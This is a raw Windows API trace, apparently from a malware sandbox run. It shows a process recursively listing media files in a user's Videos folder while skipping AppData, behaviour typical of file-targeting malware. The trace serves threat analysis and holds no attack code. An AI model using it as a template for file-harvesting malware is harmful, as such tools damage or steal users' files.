ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="RIN_E.avi", cAlternateFileName="")) returned 1 [0157.964] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x7b3a1a70, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 1 [0157.964] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x1420056, ftCreationTime.dwLowDateTime=0x51ca, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x13e0057, nFileSizeHigh=0x51ca, nFileSizeLow=0x9baa68, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="_4\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.964] FindClose (in: hFindFile=0x90afd8 | out: hFindFile=0x90afd8) returned 1 [0157.966] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, ftLastWriteTime.dwLowDateTime=0xae6eb000, ftLastWriteTime.dwHighDateTime=0x1d5dad0, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 1 [0157.966] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d049f0, ftCreationTime.dwHighDateTime=0x1d5db11, ftLastAccessTime.dwLowDateTime=0x9a14a90, ftLastAccessTime.dwHighDateTime=0x1d5da28, ftLastWriteTime.dwLowDateTime=0x9a14a90, ftLastWriteTime.dwHighDateTime=0x1d5da28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="e1Y-mgGtzCZzg", cAlternateFileName="E1Y-MG~1")) returned 1 [0157.966] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\*", lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d049f0, ftCreationTime.dwHighDateTime=0x1d5db11, ftLastAccessTime.dwLowDateTime=0x9a14a90, ftLastAccessTime.dwHighDateTime=0x1d5da28, ftLastWriteTime.dwLowDateTime=0x9a14a90, ftLastWriteTime.dwHighDateTime=0x1d5da28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90afd8 [0157.969] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d049f0, ftCreationTime.dwHighDateTime=0x1d5db11, ftLastAccessTime.dwLowDateTime=0x9a14a90, ftLastAccessTime.dwHighDateTime=0x1d5da28, ftLastWriteTime.dwLowDateTime=0x9a14a90, ftLastWriteTime.dwHighDateTime=0x1d5da28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.969] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1d6f670, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 1 [0157.969] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0xd897bd50, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 1 [0157.969] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x9fa1c510, ftLastWriteTime.dwHighDateTime=0x1d5e239, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 1 [0157.969] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc62efd0, ftCreationTime.dwHighDateTime=0x1d5e753, ftLastAccessTime.dwLowDateTime=0x9b944070, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x9b944070, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Op Gi7LiHe dQIhO", cAlternateFileName="OPGI7L~1")) returned 1 [0157.969] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\*", lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc62efd0, ftCreationTime.dwHighDateTime=0x1d5e753, ftLastAccessTime.dwLowDateTime=0x9b944070, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x9b944070, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90b098 [0157.972] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc62efd0, ftCreationTime.dwHighDateTime=0x1d5e753, ftLastAccessTime.dwLowDateTime=0x9b944070, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x9b944070, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.972] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x6074a350, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="93QZ.swf", cAlternateFileName="")) returned 1 [0157.972] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0xd04bf290, ftLastWriteTime.dwHighDateTime=0x1d5df9f, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 1 [0157.972] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0xa475b570, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 1 [0157.972] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x15e0045, ftCreationTime.dwLowDateTime=0x526b, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x1d, ftLastWriteTime.dwHighDateTime=0x1660046, nFileSizeHigh=0x526b, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="vg\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.973] FindClose (in: hFindFile=0x90b098 | out: hFindFile=0x90b098) returned 1 [0157.974] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x14c0056, ftCreationTime.dwLowDateTime=0x5283, ftCreationTime.dwHighDateTime=0x8a7560, ftLastAccessTime.dwLowDateTime=0x526e, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x356310, ftLastWriteTime.dwHighDateTime=0x1340057, nFileSizeHigh=0x5283, nFileSizeLow=0x8a7250, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="痠\x8a\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.974] FindClose (in: hFindFile=0x90afd8 | out: hFindFile=0x90afd8) returned 1 [0157.974] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x5a7a7540, ftLastWriteTime.dwHighDateTime=0x1d5dd98, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="NsEh3.swf", cAlternateFileName="")) returned 1 [0157.974] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x1160067, ftCreationTime.dwLowDateTime=0x52a8, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1300068, nFileSizeHigh=0x52a8, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Ns\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.974] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.976] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x337b2040, ftCreationTime.dwHighDateTime=0x1d5e23c, ftLastAccessTime.dwLowDateTime=0xa66b2270, ftLastAccessTime.dwHighDateTime=0x1d5db85, ftLastWriteTime.dwLowDateTime=0xa66b2270, ftLastWriteTime.dwHighDateTime=0x1d5db85, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="GHIoo2t", cAlternateFileName="")) returned 1 [0157.976] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHIoo2t", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0157.976] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x337b2040, ftCreationTime.dwHighDateTime=0x1d5e23c, ftLastAccessTime.dwLowDateTime=0xa66b2270, ftLastAccessTime.dwHighDateTime=0x1d5db85, ftLastWriteTime.dwLowDateTime=0xa66b2270, ftLastWriteTime.dwHighDateTime=0x1d5db85, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.979] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x337b2040, ftCreationTime.dwHighDateTime=0x1d5e23c, ftLastAccessTime.dwLowDateTime=0xa66b2270, ftLastAccessTime.dwHighDateTime=0x1d5db85, ftLastWriteTime.dwLowDateTime=0xa66b2270, ftLastWriteTime.dwHighDateTime=0x1d5db85, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.979] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x632e5550, ftLastWriteTime.dwHighDateTime=0x1d5e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 1 [0157.979] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x7df0cc0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 1 [0157.979] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xbdc7e7c0, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 1 [0157.979] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1a312ae0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 1 [0157.979] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x1160067, ftCreationTime.dwLowDateTime=0x5318, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x11e0068, nFileSizeHigh=0x5318, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="zE\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.979] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.980] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0xaf27bc50, ftLastWriteTime.dwHighDateTime=0x1d5deed, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 1 [0157.980] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6993f90, ftCreationTime.dwHighDateTime=0x1d5d844, ftLastAccessTime.dwLowDateTime=0x28926d40, ftLastAccessTime.dwHighDateTime=0x1d5e427, ftLastWriteTime.dwLowDateTime=0x28926d40, ftLastWriteTime.dwHighDateTime=0x1d5e427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="z58zBpaZzgTTH", cAlternateFileName="Z58ZBP~1")) returned 1 [0157.981] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH", cchCount1=13, lpString2="AppData", cchCount2=7) returned 3 [0157.981] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6993f90, ftCreationTime.dwHighDateTime=0x1d5d844, ftLastAccessTime.dwLowDateTime=0x28926d40, ftLastAccessTime.dwHighDateTime=0x1d5e427, ftLastWriteTime.dwLowDateTime=0x28926d40, ftLastWriteTime.dwHighDateTime=0x1d5e427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.987] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6993f90, ftCreationTime.dwHighDateTime=0x1d5d844, ftLastAccessTime.dwLowDateTime=0x28926d40, ftLastAccessTime.dwHighDateTime=0x1d5e427, ftLastWriteTime.dwLowDateTime=0x28926d40, ftLastWriteTime.dwHighDateTime=0x1d5e427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.987] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x6c1ae300, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 1 [0157.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0157.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cf0 [0157.987] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x72a0d840, ftLastWriteTime.dwHighDateTime=0x1d5da45, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 1 [0157.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.988] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1642dec0, ftLastWriteTime.dwHighDateTime=0x1d5e11d, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="AcJ9.swf", cAlternateFileName="")) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba900 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2d0 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.988] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x7fde61e0, ftLastWriteTime.dwHighDateTime=0x1d5df17, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.988] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x98709d60, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba900 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.988] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x39e54bc0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.988] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0xb5fc0d50, ftLastWriteTime.dwHighDateTime=0x1d5e5ba, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba900 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0157.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e90 [0157.989] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, 